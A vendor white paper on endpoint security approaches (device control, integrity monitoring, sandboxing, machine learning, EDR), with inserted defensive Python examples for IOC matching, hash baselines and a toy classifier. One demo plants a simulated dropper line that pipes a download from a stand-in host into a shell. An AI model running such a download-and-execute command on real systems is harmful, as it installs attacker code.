White Paper

SO YOU THINK
YOU ARE PROTECTED?
THINK AGAIN!
NEXT GENERATION ENDPOINT SECURITY
www.securelink.net
BACKGROUND
Macro trends like cloud and mobility change the requirements for endpoint security. Data can be stored on premises, in public clouds, or on the endpoints themselves, and it needs to be protected and available 24x7 regardless of where it resides.
At the same time this data is a high-value target for today's organized crime. The total global impact of cybercrime has been estimated at USD 3 trillion, which would make it more profitable than the global trade in marijuana, cocaine and heroin combined.
So how can you keep your data and business protected without losing the agility required to compete in your quickly evolving marketspace?
CHALLENGES
Antivirus/anti-spyware databases are 90-99% effective at detecting well-known, widely circulating threats. However, they are only 20-50% effective at detecting new or low-volume threats.

KNOWN VS UNKNOWN THREATS
Historically, the technical battle between cybercrime and protection has been very reactive. First a threat has to present itself; only then can the industry mitigate it by writing different types of signatures to detect and block it.

Some examples:
• A malicious file is found and an antivirus signature is written to match the exact fingerprint of the file, so that it can be detected and blocked.
• Forensics of an infected endpoint provides a set of IOCs (Indicators of Compromise). These can be shared across endpoints, customers and industries to find other infected endpoints.
• A botnet is discovered. The IP addresses and/or URLs of its command and control (C&C) servers are identified and shared to help block C&C connections and identify infected endpoints.

This type of functionality is important to help us detect and protect against well-known threats. But, since there is no such thing as 100% protection, how can we protect better against the unknown?

IT IS ALL ABOUT BALANCE
There are a number of alternative technical approaches to better protect against unknown threats. Which one you choose depends on the balance between the need for security on the one hand and the demands on availability and agility on the other.

Some examples:
• A critical SCADA system may not require much interaction with the outside world, so by isolating it at the network level the risk of infection or attack can be massively reduced.
• The software running on a Point-of-Sale terminal should not change very often, so by locking down which applications are allowed to run, the risk is massively reduced.

The above examples do, however, not work very well on "normal" end-users' laptops: end-users often require a lot of interaction with the outside world, and hence the flexibility to update and add the software they need in order to do their job.

To address the above challenges, the security industry has come up with a selection of different approaches to manage the risks related to end-user needs and behavior. They all have their advantages and disadvantages. The next section provides an overview of some important types of endpoint security features and their respective key benefits.
ENDPOINT SECURITY CATEGORIES
In the best of worlds all the endpoint security needed would be available in one product, or even better, just integrated into the operating system. This is unfortunately not the case. Many different types of features are needed, and different vendors excel in different areas. The following are some of the more common and important areas.

01. PERIPHERAL DEVICE SECURITY
Somewhat simplified, peripheral devices can be viewed as basically all the things you connect to your USB port. This includes USB memory sticks, keyboards, external hard drives, etc.

One popular way of getting into companies is the so-called "candy drop", i.e. spreading infected USB sticks in the public areas of a company in the hope that someone will pick one up and connect it to their laptop. You could argue that no one would be so unaware as to click on a file from an unknown USB key. However, too many people do, and for those who do not, the cybercrime industry has thought of that too.

The USB standard lets the device tell the host what type of device it is. A malicious USB stick can therefore announce itself as a keyboard and, once connected, type commands into the laptop as if the user had entered them. This runs the attacker's code even though autorun is disabled, because nothing is auto-run: the host simply trusts the keystrokes.

To mitigate this threat there are Device Control features available that help you control what users plug into their laptops. This increases security, but the big challenge lies in providing an effective work environment and managing real-world situations, such as when the CEO calls and has an issue downloading pictures from his smartphone.

02. COMPLIANCE
Many of the different security standards (PCI, CIS, NIST, etc.) recommend or require that, as soon as a system is put in a known and trusted state, all subsequent changes are detected and logged. To enable this there are File Integrity Monitoring features that monitor all changes, log them and compare them to different best practices and compliance frameworks. This helps detect suspicious or unauthorized deviations and changes.

03. SECURE ACCESS
Information is worthless if it is not available to those who need it. In order to provide secure access to company information, organizations need to control who has access to what. It is also important to ensure that information cannot be eavesdropped on or modified in transit, and that access is not granted to an infected endpoint that could steal information and infect other devices.

Secure access can be divided into two different categories:
• Remote access (often referred to as VPN or SSL-VPN)
• Local access (often referred to as NAC, Network Access Control)

Secure Access functionality can be part of the OS, included in an endpoint security product, or added as stand-alone software that specializes in providing only this functionality.
04. DATA SECURITY
Disk encryption
This is used to prevent data from being accessed if your device is stolen or lost. The drawback is that once the machine has booted and the disk has been unlocked, the operating system reads it transparently, so malware running on the laptop has access to the unencrypted data as soon as the laptop is started.

File encryption
This is used to protect very sensitive files. The files are only decrypted when they are accessed, so malware will not have access to the unencrypted data at other times. Please note that advanced malware can record your keystrokes to get hold of decryption passwords and decrypt the files.

Data Loss Prevention
This is a feature designed to detect potential data breaches and data exfiltration by detecting, monitoring and blocking the movement of sensitive data. Large-scale implementations of DLP that aim to achieve full value from the solution typically require that your data is classified by your company in order to get the proper level of protection.
05. EXPLOIT PROTECTION
A common way to infect an endpoint is to send a PDF or Office document that carries malicious code. When the end-user opens the document, the code exploits a vulnerability in the application that opens it.

To protect against such application and memory based exploits there are a couple of different features available:

HostIPS (HIPS):
There is no standard terminology for the different HIPS techniques, but they typically include some type of signature-based detection to find exploits against known vulnerabilities.

Exploit Mitigation/Traps:
Inject code into the protected processes that detects when running code attempts a malicious action, such as a known exploitation technique, and blocks it.

Memory Protection:
Protect against memory exploits, process injection and privilege escalation.

06. MALWARE PROTECTION
Traditionally, the main task for antivirus products has been to detect malicious programs. This has historically been done by creating a signature for every new malware that is detected and pushing it to all the endpoints, which can then detect that malware.

Since several hundred thousand new malware samples are created every day, this approach is no longer optimal. In addition, it requires that someone else has already found the malware so that a signature can be written for it. This means that you can only protect against the known, not the unknown.

Below are some of the different options available for protecting against malware:

Malware Signatures – Traditional Antivirus
The main benefit of signature-based detection is that the malware is known, meaning that there is often additional information available about the malware and what it tries to do. A drawback with signatures is that they are reactive and provide very limited protection against zero-day malware and targeted attacks.

Threat Intelligence
Adding a feed of IPs or URLs of known malicious domains or botnets to the analysis means that connections to these sites can be blocked to prevent download of malware or callbacks to such domains. This is generally a very good complement for detection, but it is still reactive, since someone needs to detect these domains first, and they seldom have a long lifespan.
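Both the IOC sharing described under KNOWN VS UNKNOWN THREATS (forensic IOCs and botnet C&C addresses shared to find other infected endpoints) and the Threat Intelligence option above come down to the same mechanism: every outbound connection is checked against a list of indicators. The script below is an added example, not code from the white paper or from any SecureLink product. The feed format, the proxy-log format, and every address, domain and URL in it are constructed for the illustration.

```python
"""Added example (not from the white paper): matching outbound connections
recorded in a proxy log against a threat-intelligence feed of C&C indicators.
Feed entries, log lines and addresses are all constructed for the illustration."""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed feed, one "type,value" indicator per line (hypothetical values).
IOC_FEED = """\
ip,203.0.113.45
ip,198.51.100.0/24
domain,update-checker.example
url,http://cdn.example.net/static/loader.php
"""

# Constructed proxy log: timestamp client method url status
LOG_LINES = """\
2016-03-01T10:00:01Z 10.1.2.3 GET http://www.example.com/index.html 200
2016-03-01T10:00:05Z 10.1.2.3 POST http://update-checker.example/ping 200
2016-03-01T10:00:09Z 10.1.2.4 GET http://cdn.example.net/static/loader.php?id=7 200
2016-03-01T10:00:12Z 10.1.2.5 GET http://198.51.100.77/b.bin 200
2016-03-01T10:00:15Z 10.1.2.6 GET http://api.update-checker.example/v1 200
"""

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$")


def normalize_url(url):
    """Compare on scheme, host and path only: query strings vary per victim."""
    parts = urlsplit(url)
    return "%s://%s%s" % (parts.scheme.lower(), parts.hostname, parts.path or "/")


def load_feed(feed_text):
    """Parse the feed into exact IPs, CIDR ranges, domains and normalized URLs."""
    feed = {"ips": set(), "nets": [], "domains": set(), "urls": set()}
    for line in feed_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        kind, value = line.split(",", 1)
        if kind == "ip" and "/" in value:
            feed["nets"].append(ipaddress.ip_network(value, strict=False))
        elif kind == "ip":
            feed["ips"].add(ipaddress.ip_address(value))
        elif kind == "domain":
            feed["domains"].add(value.lower().rstrip("."))
        elif kind == "url":
            feed["urls"].add(normalize_url(value))
    return feed


def match_url(url, feed):
    """Return (indicator_type, indicator) if the URL hits the feed, else None."""
    norm = normalize_url(url)
    if norm in feed["urls"]:
        return ("url", norm)
    host = urlsplit(url).hostname or ""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None
    if addr is not None:                       # literal IP: exact match, then CIDR
        if addr in feed["ips"]:
            return ("ip", str(addr))
        for net in feed["nets"]:
            if addr in net:
                return ("ip", str(net))
        return None
    # Domain indicators cover the domain and its subdomains (an assumption made
    # here; check how your feed intends its entries to be read).
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in feed["domains"]:
            return ("domain", candidate)
    return None


def scan_log(log_text, feed):
    """One hit per matching log line: (client, url, indicator_type, indicator)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = match_url(m.group("url"), feed)
        if hit:
            hits.append((m.group("client"), m.group("url"), hit[0], hit[1]))
    return hits


if __name__ == "__main__":
    for client, url, kind, ioc in scan_log(LOG_LINES, load_feed(IOC_FEED)):
        print("%s -> %s matched %s indicator %s" % (client, url, kind, ioc))
```

Two design points matter in practice. Matching on CIDR ranges and parent domains catches infrastructure the feed author saw only part of, but it also raises the false-positive rate, so each hit should record which indicator fired. And because C&C infrastructure is short-lived, a production feed carries first-seen and last-seen dates and entries are expired; a stale IP indicator will eventually point at re-used address space and block legitimate traffic.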
Application Control
By only allowing specified applications to run (whitelisting), a malicious process cannot start. Application control is a good solution for devices in the "Internet of Things" space that do not update or add software often. It is more cumbersome to manage for normal end-user laptops, which are more dynamic and heterogeneous in nature.
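The File Integrity Monitoring feature described under 02. COMPLIANCE and the Application Control option above both start from the same artefact: a hash of every file taken while the system is in its known and trusted state. The script below is an added example, not code from the white paper or from any SecureLink product. It builds that baseline once and then uses it both to report changes (FIM) and to decide whether a program may run (application control by content hash). The directory tree, the file names and their contents are constructed in a temporary location for the demonstration.

```python
"""Added example (not from the white paper): one SHA-256 baseline serving two
of the controls described in the text.
  (a) File Integrity Monitoring: record a directory in its known-good state,
      then report every later addition, removal and modification.
  (b) Application Control: let a program run only if its hash is on the list
      taken from that known-good state.
The directory tree and its files are constructed in a temporary location."""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path (with '/' separators) -> SHA-256 for every file under root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def diff_baseline(old, new):
    """FIM report: which files were added, removed or modified since the baseline."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def is_execution_allowed(path, allowed_hashes):
    """Application control by content hash rather than by path: a trojanised
    copy dropped over the legitimate binary is refused even though its path
    was on the list."""
    return sha256_file(path) in allowed_hashes


def write(root, rel, data):
    with open(os.path.join(root, rel), "wb") as f:
        f.write(data)


def demo():
    """Build a tiny system, baseline it, then simulate an intrusion.
    Returns the FIM report and the application-control verdicts."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        os.makedirs(os.path.join(root, "etc"))
        write(root, "bin/pos-app", b"#!/bin/sh\necho legitimate POS software\n")
        write(root, "etc/app.conf", b"debug=0\n")

        baseline = build_baseline(root)                       # known-good state
        allowed = {h for p, h in baseline.items() if p.startswith("bin/")}
        verdicts = {"bin/pos-app (baseline)":
                    is_execution_allowed(os.path.join(root, "bin/pos-app"), allowed)}

        # Intrusion: config tampered, a dropper added, the app binary replaced.
        write(root, "etc/app.conf", b"debug=1\n")
        write(root, "bin/dropper", b"#!/bin/sh\ncurl http://evil.invalid/x | sh\n")
        write(root, "bin/pos-app", b"#!/bin/sh\necho backdoored\n")

        report = diff_baseline(baseline, build_baseline(root))
        verdicts["bin/pos-app (replaced)"] = is_execution_allowed(
            os.path.join(root, "bin/pos-app"), allowed)
        verdicts["bin/dropper"] = is_execution_allowed(
            os.path.join(root, "bin/dropper"), allowed)
        return report, verdicts


if __name__ == "__main__":
    fim_report, app_control = demo()
    print("FIM report:", fim_report)
    print("Execution allowed:", app_control)
```

The same report that satisfies a compliance requirement ("all subsequent changes are detected and logged") is also the management cost the text warns about: on a dynamic end-user laptop every legitimate update shows up as "modified" and needs a new baseline, which is why hash-based allow-listing fits a Point-of-Sale terminal far better than a developer workstation.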
Sandboxing/Emulation
This concept means sending unknown files to a controlled environment where they are executed. Once executed, the behavior is monitored to look for malicious activity. This can help detect zero-day malware based on its execution behavior and also create threat intelligence that can help detect other infected endpoints.
Sandboxing typically means a delay in delivery of the file to the target while the suspicious file is executed and analyzed. This makes it a common and good feature for mail and web gateways, but maybe not optimal for all endpoint deployments.
For endpoints there are some things to consider:
• Location: Are you running the sandbox platform locally or in the cloud?
• Scalability: If locally, how many devices do you need to support all of your endpoints?
• Remote users: How will remote users send files to the sandboxes?
• Delay: There will be a delay while waiting for the file to finish running in the sandbox. Is this acceptable to the end-user?
• "Patient Zero effect": If, for delay reasons, you allow the file to be executed locally while the analysis is still being performed, this first laptop (Patient Zero) will be infected before you can stop future attacks. How do you manage this patient zero effect?
• Evasion: How good is the sandbox technology at detecting the evasion techniques malware uses to recognize that it is being analyzed and stay quiet?

Endpoint Isolation
This concept leverages different virtualization techniques, e.g. micro-virtualization, to execute files locally on the laptop in a separate sandbox. This prevents the malicious file from reaching the operating system. Once the session is over, the virtual environment is discarded.

The main benefit is that no files need to be sent away for scanning in sandboxes, and that nothing should leave the local sandbox.

A drawback is that this concept usually has a performance impact on the endpoint, and that the isolation vendor needs to certify all OSs and applications that are supported.

For environments running a standard OS and applications, and that can enforce that no other applications are run outside of the isolation environment, this can be a good approach to ensure that malicious code only ever executes in the virtual environment.
Machine learning
Machine learning is today a common tool for solving complex problems effectively. Voice recognition, consumer profiling and insurance risk assessment all use different types of machine learning to learn patterns and quickly categorize new events correctly.
For malware detection, machine learning means identifying millions of different characteristics (features) of a file, then feeding millions of known good and known bad files into a large machine learning system so that it learns how these characteristics differ between good and bad files.
This means that a malware can be detected regardless of how many times it is rewritten to change its fingerprint, since its characteristics stay largely the same and are identified as bad. The verdict is produced by a mathematical model that examines a file prior to execution and returns a sub-second result.
This model has a very small impact on system performance and does not depend on any external signatures or sandboxes to detect and block zero-day malicious files from executing. Note that the model is only as good as the files it was trained on, and that attackers in turn try to craft files whose characteristics look benign.
This approach works well in all different types of environments and could complement or replace traditional signature-based antivirus in most cases.
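The contrast the paragraph draws, a fingerprint that changes every time the file is rewritten versus characteristics that stay the same, can be shown end to end on constructed data. The script below is an added example, not code from the white paper or from any vendor's engine. Its "files" are synthetic byte strings, its three features (byte entropy, printable ratio, share of NUL bytes) are deliberately crude, and its classifier is a nearest-centroid model trained on ten samples; a real product extracts thousands of structural features and trains on millions of files. It also includes the caveat from the text: in this toy, padding a packed body with enough plain text pulls its features back toward the benign side.

```python
"""Added example (not from the white paper): why a feature-based model still
catches a sample whose fingerprint has changed, while a hash signature does not.
The 'files' are constructed byte strings and the three features are deliberately
crude; a real engine extracts thousands of structural features and trains on
millions of samples."""
import hashlib
import math
import random
from collections import Counter


def features(data):
    """Three toy features of a file: Shannon entropy in bits per byte,
    printable-ASCII ratio, and the share of NUL bytes."""
    n = len(data)
    counts = Counter(data)
    entropy = -sum(c / n * math.log2(c / n) for c in counts.values())
    printable = sum(1 for b in data if 32 <= b < 127) / n
    nulls = counts.get(0, 0) / n
    return (entropy, printable, nulls)


class NearestCentroid:
    """Minimal classifier: standardise each feature, then return the label
    whose class mean is closest to the sample."""

    def fit(self, samples, labels):
        cols = list(zip(*samples))
        self.mean = [sum(c) / len(c) for c in cols]
        self.std = [max(math.sqrt(sum((x - m) ** 2 for x in c) / len(c)), 1e-9)
                    for c, m in zip(cols, self.mean)]
        self.centroids = {}
        for label in set(labels):
            members = [self._z(s) for s, l in zip(samples, labels) if l == label]
            self.centroids[label] = [sum(c) / len(c) for c in zip(*members)]
        return self

    def _z(self, sample):
        return [(x - m) / s for x, m, s in zip(sample, self.mean, self.std)]

    def predict(self, sample):
        z = self._z(sample)
        return min(self.centroids, key=lambda lbl: math.dist(z, self.centroids[lbl]))


def packed(seed, key):
    """Constructed stand-in for a packed malware body: a pseudo-random payload
    XORed with a one-byte key. Changing the key 'repacks' the same payload."""
    r = random.Random(seed)
    payload = bytes(r.getrandbits(8) for _ in range(2048))
    return bytes(b ^ key for b in payload)


# Constructed training corpus: plain-text "benign" files and packed "malicious" ones.
GOOD = [("config entry %d = value %d\n" % (i, i * 7)).encode() * 40 for i in range(5)]
BAD = [packed(seed, 0x5A) for seed in range(5)]

# Traditional approach: one signature per known-bad file (here its SHA-256).
SIGNATURES = {hashlib.sha256(b).hexdigest() for b in BAD}

# Model approach: learn what benign and malicious feature vectors look like.
MODEL = NearestCentroid().fit([features(d) for d in GOOD + BAD],
                              ["benign"] * len(GOOD) + ["malicious"] * len(BAD))


def classify(sample):
    """Return (signature_hit, model_verdict) for one file."""
    return (hashlib.sha256(sample).hexdigest() in SIGNATURES,
            MODEL.predict(features(sample)))


if __name__ == "__main__":
    known = BAD[0]
    rewritten = packed(0, 0x3C)                 # same payload, new key: new hash
    padded = packed(0, 0x5A) + GOOD[0] * 40     # attacker drowns the features in text
    for name, sample in [("known", known), ("rewritten", rewritten), ("padded", padded)]:
        print(name, classify(sample))
```

The rewritten sample has a different SHA-256, so the signature set misses it, but its entropy is unchanged (XOR with a constant only relabels byte values) and the model still calls it malicious. The padded sample shows the other side: a model trained on these three features can be steered, which is why the text's "complement or replace" should be read as complement unless the feature set and training corpus are far richer than this toy.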
07. DETECTION & RESPONSE
There is no such thing as 100% protection, so how should you respond when you detect a breached endpoint, and do you have the tools to respond to the breach? When an infected endpoint is found inside the company there are a lot of questions you would like to be able to answer:
• Is any other endpoint infected?
• When was this endpoint infected?
• How was it infected?
• What type of information is at risk?
• Has any data been stolen?
• Who did it and why?
To help customers with incident response there is a specific set of tools referred to as "Endpoint Detection & Response" (EDR) tools. They provide very advanced functionality for quickly understanding the impact of a breach and help respond to it.
TOP 5 TIPS FOR SECURING YOUR WINDOWS ENDPOINT!
1. Do not allow execution of unsigned programs from a user's profile directory.
Reason: a common location for malware to install itself to. (Requires exceptions.)
2. Disable support for executing JavaScript (JScript), Java and Visual Basic scripts outside of the web browser.
Reason: a common attack vector. (Could require changes to administration via scripts.)
3. Upgrade PowerShell to version 4 or later, enable logging and disable execution of unsigned scripts.
Reason: built-in security functions and much more detailed logging.
4. Do not allow, or limit, the use of local administrative privileges.
Reason: should an attacker infect a user with local administrative privileges, it would give the attacker the same privileged access.
5. Enforce separation of duties between daily work and system administration. Use strong authentication, preferably a secure vault with functionality to mask the password.
Reason: the first thing an attacker wants is access to privileged accounts. Implementing privileged account security limits the impact of a breach and also enables detection of it.
PROTECT YOUR DATA,
IN USE, AT REST AND IN TRANSIT!
SUMMARY
Today's protection of endpoints can and should include many different protective measures, to ensure protection against different types of threats. Different vendors have solutions for one or several of the threat types. However, the core functionality of endpoint protection, protecting against malicious code, is an area where the bad guys have outrun the security vendors by far over the last years. Only recently have new technologies emerged that try to attack the problem with new methods and tools.
These new types of protection methods are so-called disruptive innovations in the endpoint market. They have moved away from traditional signature-based detection to try to find more effective methods. These new technologies include machine learning (algorithm-based detection), virtualization techniques, etc.
As an organization looks at securing its endpoints, it is important to identify and prioritize the different needs and requirements on endpoint protection. Different solutions are good for different types of deployments, and the organization may very well end up needing more than one endpoint protection agent to protect itself.
[Figure: "Use-cases covered" versus "Time". The old market demand curve and old market supply curve meet at "Current Endpoint Protection"; the new market demand curve ("Protections against unknown threats") and new market supply curve meet at "Next Generation Endpoint Protection".]
The picture illustrates how existing, traditional signature-based endpoint protection products often include many of the modules described above. However, they are not really solving the market demand for protection against unknown threats.
The newer, innovative endpoint protection vendors are focused on addressing this, but they may not yet have all the modules customers are looking for. As the innovative vendors develop their products and capabilities, it is very likely that we will see a big shift in the endpoint protection market.
If you would like to discuss which endpoint solution that will best address your specific needs,
please contact your local SecureLink sales representative.